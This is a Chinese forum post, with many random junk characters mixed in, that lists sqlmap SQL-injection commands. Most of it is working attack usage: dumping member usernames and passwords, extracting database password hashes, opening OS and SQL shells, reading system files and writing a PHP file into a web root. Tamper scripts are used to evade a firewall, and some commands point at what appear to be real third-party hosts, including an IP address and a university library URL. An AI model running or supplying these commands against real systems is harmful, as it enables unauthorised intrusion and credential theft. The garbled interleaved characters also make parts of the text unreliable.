找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1860|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap
' E" _1 H* V! u2 ?, w- Y5 ^3 M" `* R8 ~5 o$ F
update :::::>     in the folder   after  execute    following   order : svn update
- u8 v( `" Y# o6 k. J6 ^3 T6 m' g  d$ y# Y5 S) G
sqlmap.py -r 1.txt --current-db
) U* Z2 R) o: v+ j$ P) I' k; E: i
1 N# x( U% U& r3 H: Vv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
+ L% O. D6 e3 L' V3 P$ b- Y9 _9 Y% w- h/ {6 j
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) / Q% a& P8 w. e0 c! m0 K# O' a( U
猜解数据库1 Y  s& x5 `8 r* b7 o( \
./sqlmap.py -u "injection-url" --dbs  @# `: e. b6 k
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"8 y6 j/ `' w2 M; X6 b
3 e/ T' a+ w0 x  N) C  |
猜解表名7 d9 j7 x. Q6 }1 L( }/ T
./sqlmap.py -u "injection-url" -D database_name --tables; r0 X: I$ k7 r0 a8 T9 K

* \. ]8 {& n3 esqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
( C0 d( s0 X7 C; D7 msqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" 2 e% k$ p/ s2 C4 [5 ]2 ?5 M; G1 z
$ C( n' G- G( N4 X% o4 ~( e8 ~
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
0 M% E. h! `5 A- m8 ]$ ]
' Z: p+ w3 d9 m7 wsqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"1 ]3 U& w2 S% y2 Q% g  q
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
3 y+ h) m9 z- m7 [. t% _sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
' E8 u  K3 w$ y% c! Ksqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
) T4 W2 U& o4 Q2 o4 b& j1 k  V, Y% ^( D8 U. }
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"2 f" Q- F" k# F' n6 N8 r  y5 a8 y3 e3 Y
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py") h9 f' f: P4 H! ^( B) J! N, `, S6 a
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"+ _$ _& ~, q; z& F: K+ I& b
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
; Z9 U+ ~1 R  M7 B( n- q! @sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump9 G. V6 u3 ^# V2 x1 M9 I
3 j# J7 t4 M6 Q7 l1 o/ Q
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
3 e/ R5 C4 K( W# Q7 Q% wsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"& j  x( d) O: m* P* n7 ^
$ r# ~+ N6 l4 ]. ?
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
9 A" p+ s; g7 P' E& u猜解列名. N1 O2 H9 F) A
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
! Q! _! i3 N$ B' `. \# m
/ ]: `, h4 i6 ?sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" ; t$ b1 P+ {4 f+ y+ S6 r7 ]) L( I. T
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
* `$ o" U' g& z0 s/ D9 ]) Z; }0 ?sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
* m$ R. {2 x- j" V5 j7 j# K' t. P; D4 h6 `& `6 z8 k; Z
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
# @, [. U3 b3 o: \&submit=Go1 L5 q6 l( b  @$ }' q. _
猜解值
6 w# I7 y5 t$ _./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
0 {+ M* M+ C1 U4 }& c========================================================
, ?  T3 n6 F( ?% V" _搜索表名中包括mana字符的
+ b; {$ Q1 ^' ^/sqlmap.py -u "injection-url" -T mana --search# r2 D- [: k. M  [& A
返回一个交互式sql shell" N: N" [6 S. K. k) v
/sqlmap.py -u "injection-url" --sql-shell
" M3 g4 _) A9 f( l5 R. w读取指定文件(需权限)( B7 z, q: x: c! G" l$ z
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"9 \( Q& q8 g' \7 f/ ~
查看当前 用户 及 数据库 3 v+ S" _; l/ g) `
/sqlmap.py -u "injection-url" --current-user --current-db
6 B1 C7 h' z% i3 [; Z" \+ K本地文件 写入 远程目标绝对路径
0 B3 ^7 |* @% s, z( U/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
7 G" }) i6 }1 Msqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" " @& `7 z+ ]5 y

2 X& v4 g, Q' ?$ }8 W: D  \: Asqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径* Y- h3 y: I  n5 v; K1 c- q
查看某用的权限, Y* Z4 [3 L, i/ O6 {: E" `  M0 }
/sqlmap.py -u "injection-url" --privileges -U root3 M- L% n/ |/ W3 L1 T
查看当前用户是否为dba
1 r' w( B6 g- B7 `* E/sqlmap.py -u "injection-url" --is-dba
) Q; P" e) P$ Y( q! O读取所有数据库用户或指定数据库用户的密码; Y9 M1 x% u! S; P  E, Y
sqlmap.py -r 1.txt --users --passwords
3 G9 O' V: ~: M1 [. ^- Tsqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" : _( m# m* L* [7 o  a

; p+ o  s+ z) L3 O7 m( u& ~/sqlmap.py -u "injection-url" --passwords -U root' m% N( R# F+ l) N6 h9 N9 V
" T7 A/ T  y9 d, }
--start&&--stop 与 --first&&--last 的区别
! e2 P" G+ A, \8 y3 ?" Q/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)+ Z$ \& d! I" a4 o/ y

, c$ k& _( j) |: i' T( ^0 U从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)0 }; f4 i  W4 @" p2 C
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
& o5 X3 g+ t  A8 [' e/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns$ |$ @, v, ]7 {7 x7 f& V. V2 S

, w, o; J5 e% I/ G- U  j执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
, E2 ]3 K9 b9 E& v# b/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
, R6 }' I  A% ~' ]# A% G. g
( Q' S+ A& `9 K. ]1 f+ ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表